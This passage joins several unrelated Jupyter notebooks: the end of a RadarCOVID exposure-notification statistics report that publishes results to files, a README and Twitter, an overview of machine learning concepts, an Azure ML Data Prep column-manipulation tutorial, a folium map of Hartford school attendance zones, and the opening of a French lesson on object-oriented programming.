.rename_axis(columns=display_column_name_mapping)
.rename_axis(index=display_column_name_mapping),
fmt=".0f",
annot=True,
ax=generation_to_upload_period_pivot_table_ax)
generation_to_upload_period_pivot_table_ax.get_figure().tight_layout()
```
### Hourly Summary Plots
```
hourly_summary_ax_list = hourly_summary_df \
.rename_axis(index=display_column_name_mapping) \
.rename(columns=display_column_name_mapping) \
.plot.bar(
title=f"Last 24h Summary",
rot=45, subplots=True, legend=False)
ax_ = hourly_summary_ax_list[-1]
ax_.get_figure().tight_layout()
ax_.get_figure().subplots_adjust(top=0.9)
_ = ax_.set_xticklabels(sorted(hourly_summary_df.index.strftime("%Y-%m-%d@%H").tolist()))
```
### Publish Results
```
github_repository = os.environ.get("GITHUB_REPOSITORY")
if github_repository is None:
github_repository = "pvieito/Radar-STATS"
github_project_base_url = "https://github.com/" + github_repository
display_formatters = {
display_column_name_mapping["teks_per_shared_diagnosis"]: lambda x: f"{x:.2f}" if x != 0 else "",
display_column_name_mapping["shared_diagnoses_per_covid_case"]: lambda x: f"{x:.2%}" if x != 0 else "",
display_column_name_mapping["shared_diagnoses_per_covid_case_es"]: lambda x: f"{x:.2%}" if x != 0 else "",
}
general_columns = \
list(filter(lambda x: x not in display_formatters, display_column_name_mapping.values()))
general_formatter = lambda x: f"{x}" if x != 0 else ""
display_formatters.update(dict(map(lambda x: (x, general_formatter), general_columns)))
daily_summary_table_html = result_summary_with_display_names_df \
.head(daily_plot_days) \
.rename_axis(index=display_column_name_mapping) \
.rename(columns=display_column_name_mapping) \
.to_html(formatters=display_formatters)
multi_backend_summary_table_html = multi_backend_summary_df \
.head(daily_plot_days) \
.rename_axis(columns=display_column_name_mapping) \
.rename(columns=display_column_name_mapping) \
.rename_axis(index=display_column_name_mapping) \
.to_html(formatters=display_formatters)
def format_multi_backend_cross_sharing_fraction(x):
if pd.isna(x):
return "-"
elif round(x * 100, 1) == 0:
return ""
else:
return f"{x:.1%}"
multi_backend_cross_sharing_summary_table_html = multi_backend_cross_sharing_summary_df \
.rename_axis(columns=display_column_name_mapping) \
.rename(columns=display_column_name_mapping) \
.rename_axis(index=display_column_name_mapping) \
.to_html(
classes="table-center",
formatters=display_formatters,
float_format=format_multi_backend_cross_sharing_fraction)
multi_backend_cross_sharing_summary_table_html = \
multi_backend_cross_sharing_summary_table_html \
.replace("<tr>","<tr style=\"text-align: center;\">")
extraction_date_result_summary_df = \
result_summary_df[result_summary_df.index.get_level_values("sample_date") == extraction_date]
extraction_date_result_hourly_summary_df = \
hourly_summary_df[hourly_summary_df.extraction_date_with_hour == extraction_date_with_hour]
covid_cases = \
extraction_date_result_summary_df.covid_cases.item()
shared_teks_by_generation_date = \
extraction_date_result_summary_df.shared_teks_by_generation_date.item()
shared_teks_by_upload_date = \
extraction_date_result_summary_df.shared_teks_by_upload_date.item()
shared_diagnoses = \
extraction_date_result_summary_df.shared_diagnoses.item()
teks_per_shared_diagnosis = \
extraction_date_result_summary_df.teks_per_shared_diagnosis.item()
shared_diagnoses_per_covid_case = \
extraction_date_result_summary_df.shared_diagnoses_per_covid_case.item()
shared_teks_by_upload_date_last_hour = \
extraction_date_result_hourly_summary_df.shared_teks_by_upload_date.sum().astype(int)
display_source_regions = ", ".join(report_source_regions)
if len(report_source_regions) == 1:
display_brief_source_regions = report_source_regions[0]
else:
display_brief_source_regions = f"{len(report_source_regions)} 🇪🇺"
def get_temporary_image_path() -> str:
return os.path.join(tempfile.gettempdir(), str(uuid.uuid4()) + ".png")
def save_temporary_plot_image(ax):
if isinstance(ax, np.ndarray):
ax = ax[0]
media_path = get_temporary_image_path()
ax.get_figure().savefig(media_path)
return media_path
def save_temporary_dataframe_image(df):
import dataframe_image as dfi
df = df.copy()
df_styler = df.style.format(display_formatters)
media_path = get_temporary_image_path()
dfi.export(df_styler, media_path)
return media_path
summary_plots_image_path = save_temporary_plot_image(
ax=summary_ax_list)
summary_table_image_path = save_temporary_dataframe_image(
df=result_summary_with_display_names_df)
hourly_summary_plots_image_path = save_temporary_plot_image(
ax=hourly_summary_ax_list)
multi_backend_summary_table_image_path = save_temporary_dataframe_image(
df=multi_backend_summary_df)
generation_to_upload_period_pivot_table_image_path = save_temporary_plot_image(
ax=generation_to_upload_period_pivot_table_ax)
```
### Save Results
```
report_resources_path_prefix = "Data/Resources/Current/RadarCOVID-Report-"
result_summary_df.to_csv(
report_resources_path_prefix + "Summary-Table.csv")
result_summary_df.to_html(
report_resources_path_prefix + "Summary-Table.html")
hourly_summary_df.to_csv(
report_resources_path_prefix + "Hourly-Summary-Table.csv")
multi_backend_summary_df.to_csv(
report_resources_path_prefix + "Multi-Backend-Summary-Table.csv")
multi_backend_cross_sharing_summary_df.to_csv(
report_resources_path_prefix + "Multi-Backend-Cross-Sharing-Summary-Table.csv")
generation_to_upload_period_pivot_df.to_csv(
report_resources_path_prefix + "Generation-Upload-Period-Table.csv")
_ = shutil.copyfile(
summary_plots_image_path,
report_resources_path_prefix + "Summary-Plots.png")
_ = shutil.copyfile(
summary_table_image_path,
report_resources_path_prefix + "Summary-Table.png")
_ = shutil.copyfile(
hourly_summary_plots_image_path,
report_resources_path_prefix + "Hourly-Summary-Plots.png")
_ = shutil.copyfile(
multi_backend_summary_table_image_path,
report_resources_path_prefix + "Multi-Backend-Summary-Table.png")
_ = shutil.copyfile(
generation_to_upload_period_pivot_table_image_path,
report_resources_path_prefix + "Generation-Upload-Period-Table.png")
```
### Publish Results as JSON
```
def generate_summary_api_results(df: pd.DataFrame) -> list:
api_df = df.reset_index().copy()
api_df["sample_date_string"] = \
api_df["sample_date"].dt.strftime("%Y-%m-%d")
api_df["source_regions"] = \
api_df["source_regions"].apply(lambda x: x.split(","))
return api_df.to_dict(orient="records")
summary_api_results = \
generate_summary_api_results(df=result_summary_df)
today_summary_api_results = \
generate_summary_api_results(df=extraction_date_result_summary_df)[0]
summary_results = dict(
backend_identifier=report_backend_identifier,
source_regions=report_source_regions,
extraction_datetime=extraction_datetime,
extraction_date=extraction_date,
extraction_date_with_hour=extraction_date_with_hour,
last_hour=dict(
shared_teks_by_upload_date=shared_teks_by_upload_date_last_hour,
shared_diagnoses=0,
),
today=today_summary_api_results,
last_7_days=last_7_days_summary,
last_14_days=last_14_days_summary,
daily_results=summary_api_results)
summary_results = \
json.loads(pd.Series([summary_results]).to_json(orient="records"))[0]
with open(report_resources_path_prefix + "Summary-Results.json", "w") as f:
json.dump(summary_results, f, indent=4)
```
### Publish on README
```
with open("Data/Templates/README.md", "r") as f:
readme_contents = f.read()
readme_contents = readme_contents.format(
extraction_date_with_hour=extraction_date_with_hour,
github_project_base_url=github_project_base_url,
daily_summary_table_html=daily_summary_table_html,
multi_backend_summary_table_html=multi_backend_summary_table_html,
multi_backend_cross_sharing_summary_table_html=multi_backend_cross_sharing_summary_table_html,
display_source_regions=display_source_regions)
with open("README.md", "w") as f:
f.write(readme_contents)
```
### Publish on Twitter
```
enable_share_to_twitter = os.environ.get("RADARCOVID_REPORT__ENABLE_PUBLISH_ON_TWITTER")
github_event_name = os.environ.get("GITHUB_EVENT_NAME")
if enable_share_to_twitter and github_event_name == "schedule" and \
(shared_teks_by_upload_date_last_hour or not are_today_results_partial):
import tweepy
twitter_api_auth_keys = os.environ["RADARCOVID_REPORT__TWITTER_API_AUTH_KEYS"]
twitter_api_auth_keys = twitter_api_auth_keys.split(":")
auth = tweepy.OAuthHandler(twitter_api_auth_keys[0], twitter_api_auth_keys[1])
auth.set_access_token(twitter_api_auth_keys[2], twitter_api_auth_keys[3])
api = tweepy.API(auth)
summary_plots_media = api.media_upload(summary_plots_image_path)
summary_table_media = api.media_upload(summary_table_image_path)
generation_to_upload_period_pivot_table_image_media = api.media_upload(generation_to_upload_period_pivot_table_image_path)
media_ids = [
summary_plots_media.media_id,
summary_table_media.media_id,
generation_to_upload_period_pivot_table_image_media.media_id,
]
if are_today_results_partial:
today_addendum = " (Partial)"
else:
today_addendum = ""
def format_shared_diagnoses_per_covid_case(value) -> str:
if value == 0:
return "–"
return f"≤{value:.2%}"
display_shared_diagnoses_per_covid_case = \
format_shared_diagnoses_per_covid_case(value=shared_diagnoses_per_covid_case)
display_last_14_days_shared_diagnoses_per_covid_case = \
format_shared_diagnoses_per_covid_case(value=last_14_days_summary["shared_diagnoses_per_covid_case"])
display_last_14_days_shared_diagnoses_per_covid_case_es = \
format_shared_diagnoses_per_covid_case(value=last_14_days_summary["shared_diagnoses_per_covid_case_es"])
status = textwrap.dedent(f"""
#RadarCOVID – {extraction_date_with_hour}
Today{today_addendum}:
- Uploaded TEKs: {shared_teks_by_upload_date:.0f} ({shared_teks_by_upload_date_last_hour:+d} last hour)
- Shared Diagnoses: ≤{shared_diagnoses:.0f}
- Usage Ratio: {display_shared_diagnoses_per_covid_case}
Last 14 Days:
- Usage Ratio (Estimation): {display_last_14_days_shared_diagnoses_per_covid_case}
- Usage Ratio (Official): {display_last_14_days_shared_diagnoses_per_covid_case_es}
Info: {github_project_base_url}#documentation
""")
status = status.encode(encoding="utf-8")
api.update_status(status=status, media_ids=media_ids)
```
| github_jupyter |
# Advanced Analytics and Machine Learning Overview
This notebook offers a basic overview of advanced analytics, some example use cases, and a basic advanced analytics workflow.
## A Short Primer on Advanced Analytics
Advanced analytics refers to a variety of techniques aimed at solving the core problem of deriving insights and making predictions or recommendations based on data. The best organization for machine learning is structured based on the task that you’d like to perform. The most common tasks include:
* Supervised learning, including classification and regression, where the goal is to predict a label for each data point based on various features.
* Recommendation engines to suggest products to users based on behavior.
* Unsupervised learning, including clustering, anomaly detection, and topic modeling, where the goal is to discover structure in the data.
* Graph analytics tasks such as searching for patterns in a social network.
Let’s review each of these tasks along with some common machine learning and advanced analytics use cases. The following books are great resources for learning more about the individual analytics (and, as a bonus, they are freely available on the web):
[An Introduction to Statistical Learning](http://www-bcf.usc.edu/~gareth/ISL/) by Gareth James, Daniela Witten, Trevor Hastie, and Robert Tibshirani.
[Elements of Statistical Learning](https://web.stanford.edu/~hastie/ElemStatLearn/) by Trevor Hastie, Robert Tibshirani, and Jerome Friedman.
[Deep Learning](http://www.deeplearningbook.org/) by Ian Goodfellow, Yoshua Bengio, and Aaron Courville.
### Supervised Learning
Supervised learning is probably the most common type of machine learning. The goal is simple: using historical data that already has labels (often called the dependent or target variables), train a model to predict the values of those labels based on various features of the data points. One example would be to predict a person’s income (the dependent variable) based on age (a feature). This training process usually proceeds through an iterative optimization algorithm such as gradient descent. The training algorithm starts with a basic model and gradually improves it by adjusting various internal parameters (coefficients) during each training iteration. The result of this process is a trained model that you can use to make predictions on new data. There are a number of different tasks we’ll need to complete as part of the process of training and making predictions, such as measuring the success of trained models before using them in the field, but the fundamental principle is simple: train on historical data, ensure that it generalizes to data we didn’t train on, and then make predictions on new data.
We can further organize supervised learning based on the type of variable we’re looking to predict. We’ll get to that next.
**CLASSIFICATION**
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-supervised-classification.png?raw=true" width="400" align="center"/>
One common type of supervised learning is classification. Classification is the act of training an algorithm to predict a dependent variable that is categorical (belonging to a discrete, finite set of values). The most common case is binary classification, where our resulting model will make a prediction that a given item belongs to one of two groups. The canonical example is classifying email spam. Using a set of historical emails that are organized into groups of spam emails and not spam emails, we train an algorithm to analyze the words in, and any number of properties of, the historical emails and make predictions about them. Once we are satisfied with the algorithm’s performance, we use that model to make predictions about future emails the model has never seen before.
When we classify items into more than just two categories, we call this multiclass classification. For example, we may have four different categories of email (as opposed to the two categories in the previous paragraph): spam, personal, work related, and other. There are many use cases for classification, including:
* Predicting disease: A doctor or hospital might have a historical dataset of behavioral and physiological attributes of a set of patients. They could use this dataset to train a model on this historical data (and evaluate its success and ethical implications before applying it) and then leverage it to predict whether or not a patient has heart disease or not. This is an example of binary classification (healthy heart, unhealthy heart) or multiclass classification (healthly heart, or one of several different diseases).
* Classifying images: There are a number of applications from companies like Apple, Google, or Facebook that can predict who is in a given photo by running a classification model that has been trained on historical images of people in your past photos. Another common use case is to classify images or label the objects in images.
* Predicting customer churn: A more business-oriented use case might be predicting customer churn—that is, which customers are likely to stop using a service. You can do this by training a binary classifier on past customers that have churned (and not churned) and using it to try and predict whether or not current customers will churn.
* Buy or won’t buy: Companies often want to predict whether visitors of their website will purchase a given product. They might use information about users’ browsing pattern or attributes such as location in order to drive this prediction.
There are many more use cases for classification beyond these examples. We will introduce more use cases in the upcoming notebooks.
**REGRESSION**
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-supervised-regression.png?raw=true" width="400" align="center"/>
In classification, our dependent variable is a set of discrete values. In regression, we instead try to predict a continuous variable (a real number). In simplest terms, rather than predicting a category, we want to predict a value on a number line. The rest of the process is largely the same, which is why they’re both forms of supervised learning. We will train on historical data to make predictions about data we have never seen. Here are some typical examples:
* Predicting sales: A store may want to predict total product sales on given data using historical sales data. There are a number of potential input variables, but a simple example might be using last week’s sales data to predict the next day’s data.
* Predicting height: Based on the heights of two individuals, we might want to predict the heights of their potential children.
* Predicting the number of viewers of a show: A media company like Netflix might try to predict how many of their subscribers will watch a particular show.
### Unsupervised Learning
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-unsupervised.png?raw=true" width="400" align="center"/>
Unsupervised learning is the act of trying to find patterns or discover the underlying structure in a given set of data. This differs from supervised learning because there is no dependent variable (label) to predict.
Some example use cases for unsupervised learning include:
* Anomaly detection: Given some standard event type often occuring over time, we might want to report when a nonstandard type of event occurs. For example, a security officer might want to receive notifications when a strange object (think vehicle, skater, or bicyclist) is observed on a pathway.
* User segmentation: Given a set of user behaviors, we might want to better understand what attributes certain users share with other users. For instance, a gaming company might cluster users based on properties like the number of hours played in a given game. The algorithm might reveal that casual players have very different behavior than hardcore gamers, for example, and allow the company to offer different recommendations or rewards to each player.
* Topic modeling: Given a set of documents, we might analyze the different words contained therein to see if there is some underlying relation between them. For example, given a number of web pages on data analytics, a topic modeling algorithm can cluster them into pages about machine learning, SQL, streaming, and so on based on groups of words that are more common in one topic than in others.
Intuitively, it is easy to see how segmenting customers could help a platform cater better to each set of users. However, it may be hard to discover whether or not this set of user segments is “correct”. For this reason, it can be difficult to determine whether a particular model is good or not.
### Recommendation
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-recommendation.png?raw=true" width="400" align="center"/>
Recommendation is one of the most intuitive applications of advanced analytics. By studying people’s explicit preferences (through ratings) or implicit ones (through observed behavior) for various products or items, an algorithm can make recommendations on what a user may like by drawing similarities between the users or items. By looking at these similarities, the algorithm makes recommendations to users based on what similar users liked, or what other products resemble the ones the user already purchased. Here are some example use cases:
* Movie recommendations: Netflix uses recommender engines to make large-scale movie recommendations to its users. It does this by studying what movies users watch and do not watch in the Netflix application. In addition, Netflix likely takes into consideration how similar a given user’s ratings are to other users’.
* Product recommendations: Amazon uses product recommendations as one of its main tools to increase sales. For instance, based on the items in our shopping cart, Amazon may recommend other items that were added to similar shopping carts in the past. Likewise, on every product page, Amazon shows similar products purchased by other users.
### Graph Analytics
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-graph-analytics.png?raw=true" width="400" align="center"/>
While less common than classification and regression, graph analytics is a powerful tool. Fundamentally, graph analytics is the study of structures in which we specify vertices (which are objects) and edges (which represent the relationships between those objects). For example, the vertices might represent people and products, and edges might represent a purchase. By looking at the properties of vertices and edges, we can better understand the connections between them and the overall structure of the graph. Since graphs are all about relationships, anything that specifies a relationship is a great use case for graph analytics. Some examples include:
* Fraud prediction: Capital One uses graph analytics to better understand fraud networks. By using historical fraudulent information (like phone numbers, addresses, or names) they discover fraudulent credit requests or transactions. For instance, any user accounts within two hops of a fraudulent phone number might be considered suspicious.
* Anomaly detection: By looking at how networks of individuals connect with one another, outliers and anomalies can be flagged for manual analysis. For instance, if typically in our data each vertex has ten edges associated with it and a given vertex only has one edge, that might be worth investigating as something strange.
* Classification: Given some facts about certain vertices in a network, you can classify other vertices according to their connection to the original node. For instance, if a certain individual is labeled as an influencer in a social network, we could classify other individuals with similar network structures as influencers.
* Recommendation: Google’s original web recommendation algorithm, PageRank, is a graph algorithm that analyzes website relationships in order to rank the importance of web pages. For example, a web page that has a lot of links to it is ranked as more important than one with no links to it.
## The Advanced Analytics Process
You should have a firm grasp of some fundamental use cases for machine learning and advanced analytics. However, finding a use case is only a small part of the actual advanced analytics process. There is a lot of work in preparing your data for analysis, testing different ways of modeling it, and evaluating these models. This section will provide structure to the overall anaytics process and the steps we have to take to not just perform one of the tasks just outlined, but actually evaluate success objectively in order to understand whether or not we should apply our model to the real world.
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-machine-learning-workflow.png?raw=true" width="800" align="center"/>
The overall process involves, the following steps (with some variation):
1. Gathering and collecting the relevant data for your task.
2. Cleaning and inspecting the data to better understand it.
3. Performing feature engineering to allow the algorithm to leverage the data in a suitable form (e.g., converting the data to numerical vectors).
4. Using a portion of this data as a training set to train one or more algorithms to generate some candidate models.
5. Evaluating and comparing models against your success criteria by objectively measuring results on a subset of the same data that was not used for training. This allows you to better understand how your model may perform in the wild.
6. Leveraging the insights from the above process and/or using the model to make predictions, detect anomalies, or solve more general business challenges.
These steps won’t be the same for every advanced analytics task. However, this workflow does serve as a general framework for what you’re going to need to be successful with advanced analytics. Let’s break down the process to better understand the overall objective of each step.
**DATA COLLECTION**
Naturally it’s hard to create a training set without first collecting data. Typically this means at least gathering the datasets you’ll want to leverage to train your algorithm.
**DATA CLEANING**
After you’ve gathered the proper data, you’re going to need to clean and inspect it. This is typically done as part of the exploratory data analysis process, or EDA. EDA generally means using interactive queries and visualization methods in order to better understand distributions, correlations, and other details in your data. During this process you may notice you need to remove some values that may have been misrecorded upstream or that other values may be missing. Whatever the case, it’s always good to know what is in your data to avoid mistakes down the road.
**FEATURE ENGINEERING**
Now that you collected and cleaned your dataset, it’s time to convert it to a form suitable for machine learning algorithms, which generally means numerical features. Proper feature engineering can often make or break a machine learning application, so this is one task you’ll want to do carefully. The process of feature engineering includes a variety of tasks, such as normalizing data, adding variables to represent the interactions of other variables, manipulating categorical variables, and converting them to the proper format to be input into our machine learning model.
**TRAINING MODELS**
At this point in the process we have a dataset of historical information (e.g., spam or not spam emails) and a task we would like to complete (e.g., classifying spam emails). Next, we will want to train a model to predict the correct output, given some input. During the training process, the parameters inside of the model will change according to how well the model performed on the input data. For instance, to classify spam emails, our algorithm will likely find that certain words are better predictors of spam than others and therefore weight the parameters associated with those words higher. In the end, the trained model will find that certain words should have more influence (because of their consistent association with spam emails) than others. The output of the training process is what we call a model. Models can then be used to gain insights or to make future predictions. To make predictions, you will give the model an input and it will produce an output based on a mathematical manipulation of these inputs. Using the classification example, given the properties of an email, it will predict whether that email is spam or not by comparing to the historical spam and not spam emails that it was trained on.
However, just training a model isn’t the objective—we want to leverage our model to produce insights. Thus, we must answer the question: how do we know our model is any good at what it’s supposed to do? That’s where model tuning and evaluation come in.
**MODEL TUNING AND EVALUATION**
You likely noticed earlier that we mentioned that you should split your data into multiple portions and use only one for training. This is an essential step in the machine learning process because when you build an advanced analytics model you want that model to generalize to data it has not seen before. Splitting our dataset into multiple portions allows us to objectively test the effectiveness of the trained model against a set of data that it has never seen before. The objective is to see if your model understands something fundamental about this data process or whether or not it just noticed the things particular to only the training set (sometimes called overfitting). That’s why it is called a test set. In the process of training models, we also might take another, separate subset of data and treat that as another type of test set, called a validation set, in order to try out different hyperparameters (parameters that affect the training process) and compare different variations of the same model without overfitting to the test set.
Note: Following proper training, validation, and test set best practices is essential to successfully using machine learning. It’s easy to end up overfitting (training a model that does not generalize well to new data) if we do not properly isolate these sets of data.
**LEVERAGING THE MODEL AND/OR INSIGHTS**
After running the model through the training process and ending up with a well-performing model, you are now ready to use it! Taking your model to production can be a significant challenge in and of itself.
| github_jupyter |

# Column Manipulations
Copyright (c) Microsoft Corporation. All rights reserved.<br>
Licensed under the MIT License.<br>
Azure ML Data Prep has many methods for manipulating columns, including basic CUD operations and several other more complex manipulations.
This notebook will focus primarily on data-agnostic operations. For all other column manipulation operations, we will link to their specific how-to guide.
## Table of Contents
[ColumnSelector](#ColumnSelector)<br>
[add_column](#add_column)<br>
[append_columns](#append_columns)<br>
[drop_columns](#drop_columns)<br>
[duplicate_column](#duplicate_column)<br>
[fuzzy_group_column](#fuzzy_group_column)<br>
[keep_columns](#keep_columns)<br>
[map_column](#map_column)<br>
[new_script_column](#new_script_column)<br>
[rename_columns](#rename_columns)<br>
<a id="ColumnSelector"></a>
## ColumnSelector
`ColumnSelector` is a Data Prep class that allows us to select columns by name. The idea is to be able to describe columns generally instead of explicitly, using a search term or regex expression, with various options.
Note that a `ColumnSelector` does not represent the columns they match themselves, but the selector of the described columns. Therefore if we use the same `ColumnSelector` on two different dataflows, we may get different results depending on the columns of each dataflow.
Column manipulations that can utilize `ColumnSelector` will be noted in their respective sections in this book.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
All parameters to a `ColumnSelector` are shown here for completeness. We will use `keep_columns` in our example, which will keep only the columns in the dataflow that we tell it to keep.
In the below example, we match all columns with the letter 'i'. Because we set `ignore_case` to false and `match_whole_word` to false, then any column that contains 'i' or 'I' will be selected.
```
from azureml.dataprep import ColumnSelector
column_selector = ColumnSelector(term="i",
use_regex=False,
ignore_case=True,
match_whole_word=False,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
If we set `invert` to true, we get the opposite of what we matched earlier.
```
column_selector = ColumnSelector(term="i",
use_regex=False,
ignore_case=True,
match_whole_word=False,
invert=True)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
If we change the search term to 'I' and set case sensitivity to true, we get only the handful of columns that contain an upper case 'I'.
```
column_selector = ColumnSelector(term="I",
use_regex=False,
ignore_case=False,
match_whole_word=False,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
And if we set `match_whole_word` to true, we get no results at all as there is no column called 'I'.
```
column_selector = ColumnSelector(term="I",
use_regex=False,
ignore_case=False,
match_whole_word=True,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
Finally, the `use_regex` flag dictates whether or not to treat the search term as a regex. It can be combined still with the other options.
Here we define all columns that begin with the capital letter 'I'.
```
column_selector = ColumnSelector(term="I.*",
use_regex=True,
ignore_case=True,
match_whole_word=True,
invert=False)
dflow_selected = dflow.keep_columns(column_selector)
dflow_selected.head(5)
```
<a id="add_column"></a>
## add_column
Please see [add-column-using-expression](add-column-using-expression.ipynb).
<a id="append_columns"></a>
## append_columns
Please see [append-columns-and-rows](append-columns-and-rows.ipynb).
<a id="drop_columns"></a>
## drop_columns
Data Prep supports dropping columns one or more columns in a single statement. Supports `ColumnSelector`.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
Note that there are 22 columns to begin with. We will now drop the 'ID' column and observe that the resulting dataflow contains 21 columns.
```
dflow_dropped = dflow.drop_columns('ID')
dflow_dropped.head(5)
```
We can also drop more than one column at once by passing a list of column names.
```
dflow_dropped = dflow_dropped.drop_columns(['IUCR', 'Description'])
dflow_dropped.head(5)
```
<a id="duplicate_column"></a>
## duplicate_column
Data Prep supports duplicating columns one or more columns in a single statement.
Duplicated columns are placed to the immediate right of their source column.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
We decide which column(s) to duplicate and what the new column name(s) should be with a key value pairing (dictionary).
```
dflow_dupe = dflow.duplicate_column({'ID': 'ID2', 'IUCR': 'IUCR_Clone'})
dflow_dupe.head(5)
```
<a id="fuzzy_group_column"></a>
## fuzzy_group_column
Please see [fuzzy-group](fuzzy-group.ipynb).
<a id="keep_columns"></a>
## keep_columns
Data Prep supports keeping one or more columns in a single statement. The resulting dataflow will contain only the column(s) specified; dropping all the other columns. Supports `ColumnSelector`.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
dflow_keep = dflow.keep_columns(['ID', 'Date', 'Description'])
dflow_keep.head(5)
```
Similar to `drop_columns`, we can pass a single column name or a list of them.
```
dflow_keep = dflow_keep.keep_columns('ID')
dflow_keep.head(5)
```
<a id="map_column"></a>
## map_column
Data Prep supports string mapping. For a column containing strings, we can provide specific mappings from an original value to a new value, and then produce a new column that contains the mapped values.
The mapped columns are placed to the immediate right of their source column.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
from azureml.dataprep import ReplacementsValue
replacements = [ReplacementsValue('THEFT', 'THEFT2'), ReplacementsValue('BATTERY', 'BATTERY!!!')]
dflow_mapped = dflow.map_column(column='Primary Type',
new_column_id='Primary Type V2',
replacements=replacements)
dflow_mapped.head(5)
```
<a id="new_script_column"></a>
## new_script_column
Please see [custom-python-transforms](custom-python-transforms.ipynb).
<a id="rename_columns"></a>
## rename_columns
Data Prep supports renaming one or more columns in a single statement.
```
from azureml.dataprep import auto_read_file
dflow = auto_read_file(path='../data/crime-dirty.csv')
dflow.head(5)
```
We decide which column(s) to rename and what the new column name(s) should be with a key value pairing (dictionary).
```
dflow_renamed = dflow.rename_columns({'ID': 'ID2', 'IUCR': 'IUCR_Clone'})
dflow_renamed.head(5)
```
| github_jupyter |
```
import folium
import pandas as pd
import geopandas as gpd
schools = pd.read_csv('geodata/Education_Directory.csv')
schools_hartford = schools [ schools.Town == 'Hartford' ].filter(['School Name', 'Organization Type', 'Location'])
# Clean up location coordinates
schools_hartford.Location = schools_hartford.Location.apply(lambda x: x.split('(')[1][:-1])
# Fix locations known to be wrong
schools_hartford.loc[schools_hartford['School Name'] == 'Parkville Community School', 'Location'] = '41.7566013,-72.7077116'
#schools_hartford['Organization Type'].value_counts()
gpd.GeoDataFrame(schools_hartford)
# Initialize map
m = folium.Map(
location=[41.7625, -72.6842],
tiles=None,
zoom_start=13,
control_scale=True,
)
# Add CartoDB Positron baselayer
tiles = folium.TileLayer(
tiles='CartoDB positron',
control=False,
zoom_start=12
)
# Add link to GitHub repo to attribution
tiles.options['attribution'] = '{} | {}'.format(
'<a href="https://github.com/JackDougherty/school-search-tool">View code on GitHub</a>',
tiles.options['attribution']
)
tiles.add_to(m)
colors = {
'Zone 1': 'purple',
'Zone 2': 'orange',
'Zone 3': 'yellow',
'Zone 4': 'lightblue'
}
# School zones
zones = folium.GeoJson(
f'geodata/hartford-school-attendance-zones-2010.geojson',
name='School Zones',
control=False,
style_function=lambda x: {
'fillOpacity': 0.4,
'fillColor': colors[ x['properties']['Name'] ],
'color': 'black',
'weight': '1'
}
).add_to(m)
for index, row in schools_hartford.iterrows():
folium.Marker(
location=row.Location.split(','),
tooltip=row['School Name'],
icon=folium.Icon(color='lightblue', icon_color='white', icon='graduation-cap', prefix='fa')
).add_to(m)
# Add Tooltip data
folium.GeoJsonTooltip(fields=['Name'], aliases=['School Attendance']).add_to(zones)
m.save('index2.html')
```
## Manual additions
### Geocoder
```html
<link rel="stylesheet" href="https://unpkg.com/leaflet-control-geocoder/dist/Control.Geocoder.css" />
<script src="https://unpkg.com/leaflet-control-geocoder/dist/Control.Geocoder.js"></script>
```
```js
L.Control.geocoder({
collapsed: false,
geocoder: L.Control.Geocoder.nominatim({
geocodingQueryParams: {
viewbox: '-72.719741,41.720597,-72.640434,41.813167',
bounded: 1,
}
}),
}).addTo(map_3c76f3c5303f44439633e377a081720e);
```
```html
<style>
.leaflet-right {
left: calc(50% - 140px);
}
.leaflet-control-geocoder {
float: left !important;
font-size: 1.3em;
}
.leaflet-top.leaflet-right::before {
content: "Hartford School Zone Lookup";
font-size: 1.8em;
font-weight: bold;
float: left;
margin-left: -15px;
padding: 4px;
border-radius: 4px;
}
.leaflet-control-geocoder-icon {
padding-bottom: 5px;
}
</style>
```
| github_jupyter |
# Programmation Orientée Objet
> Découverte de la notion d'objet
- toc: true
- badges: true
- comments: false
- categories: [python, ISN]
Objets et POO sont au centre de la manière Python fonctionne. Vous n'êtes pas obligé d'utiliser la POO dans vos programmes - mais comprendre le concept est essentiel pour devenir plus qu'un débutant. Entre autres raisons parce que vous aurez besoin d'utiliser les classes et objets fournis par la librairie standard.
De plus, avant d'aborder la programmation d'interfaces graphiques qui utilisent abondamment les objet, des notions autour de la POO seront utiles.
## Petit historique
La programmation en tant que telle est une matière relativement récente. Etonnament la programmation orientée objet remonte aussi loin que les années 1960. *Simula* est considéré comme le premier langage de programmation orienté objet.
Les années 1970 voient les principes de la programmation par objet se développent et prennent forme au travers notamment du langage *Smalltalk*
À partir des années 1980, commence l'effervescence des langages à objets : *Objective C* (début des années 1980, utilisé sur les plateformes Mac et iOS), *C++* (C with classes) en 1983 sont les plus célèbres.
Les années 1990 voient l'âge d'or de l'extension de la programmation par objet dans les différents secteurs du développement logiciel, notemment grâce à l'émergence des systèmes d'exploitation basés sur une interface graphique (MacOS, Linux, Windows) qui font appel abondamment aux principes de la POO.
Nous verrons sur le prochain classeur comment une interface graphique peut se programmer au moyens d'objets (fenêtre, boutons, textes, champs de saisie etc...).
## Programmation procédurale
La programmation procédurale est celle que vous avez utilisé jusqu'à maintenant : cela consiste à diviser votre programme en blocs réutilisables appelés fonctions.
Vous essayez autant que possible de garder votre code en blocs modulaires, en décidant de manière logique quel bloc est appelé. Cela demande moins d’effort pour visualiser ce que votre programme fait. Cela rend plus facile la maintenance de votre code – vous pouvez voir ce que fait une portion de code. Le fait d’améliorer une fonction (qui est réutilisée) peut améliorer la performance à plusieurs endroits dans votre programme.
